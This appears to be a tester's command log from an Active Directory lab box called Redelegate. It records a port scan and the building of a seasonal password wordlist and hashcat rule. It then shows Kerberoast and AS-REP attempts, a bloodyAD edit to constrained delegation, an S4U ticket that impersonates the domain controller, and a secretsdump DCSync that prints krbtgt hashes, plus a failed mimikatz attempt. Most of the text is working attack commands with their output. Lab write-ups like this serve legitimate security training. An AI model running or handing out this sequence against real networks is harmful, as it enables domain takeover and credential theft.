# Nmap 7.94SVN scan initiated Mon Apr 14 17:32:47 2025 as: nmap -sS -T5 -p- --open -A -Pn -n -oN ext_tcp_redelegate_allports -vvv 10.10.67.58
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-14 21:35:17Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49932/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
61346/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61358/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61360/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
File: CyberAudit.txt
----------------------------------
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
File: TrainingAgenda.txt
-----------------------------
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
According with TrainingAgenda.txt file found on FTP there was a hint looks like password SeasonYear!.
The tester created a file as follows:
File: possible-passwords.txt
---------------------------------
spring
summer
fall
winter
autumn
The tester created a hashcat rules file as follows:
File: custom.rule
---------------------------------
:
l
u
$2$0$2$3
$2$0$2$4
$2$0$2$5
c $2$0$2$3
c $2$0$2$4
c $2$0$2$5
$2$0$2$3 $!
$2$0$2$4 $!
$2$0$2$5 $!
c $2$0$2$3 $!
c $2$0$2$4 $!
c $2$0$2$5 $!
Finally performed the mutation procedure to create the final wordlist.
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --asreproast asreproast.hashes
SMB 10.10.67.58 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.67.58 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.67.58 389 DC [*] Total of records returned 3
LDAP 10.10.67.58 389 DC No entries found!
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --kerberoast kerberoast.hashes
SMB 10.10.67.58 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.67.58 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.67.58 389 DC Bypassing disabled account krbtgt
LDAP 10.10.67.58 389 DC No entries found!
LDAP 10.10.67.58 389 DC [-] Error with the LDAP account used
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set object 'FS01$' 'msDS-AllowedToDelegateTo' -v 'ldap/dc.redelegate.vl'
[+] FS01$'s msDS-AllowedToDelegateTo has been updated
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr msDS-AllowedToDelegateTo
Requesting TGT using S4u
❯ impacket-getST 'redelegate.vl'/'FS01$':'Passsword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
Performing DCSync Attack
❯ KRB5CCNAME='dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc.redelegate.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
[*] Cleaning up...
Performing DCSync Attack using mimikatz (Not Working)
If someone knows why this is happend, please contact to me. I really appreciate a lot understand why this is not working as expected.
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /patch" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /all /patch
[DC] 'redelegate.vl' will be the domain
[DC] 'dc.redelegate.vl' will be the DC server
[DC] Exporting domain 'redelegate.vl'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)
mimikatz(commandline) # exit
Bye!
Performing DCSync attack using impacket toolkit
❯ impacket-getST 'redelegate.vl'/'FS01$':'NewPassword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache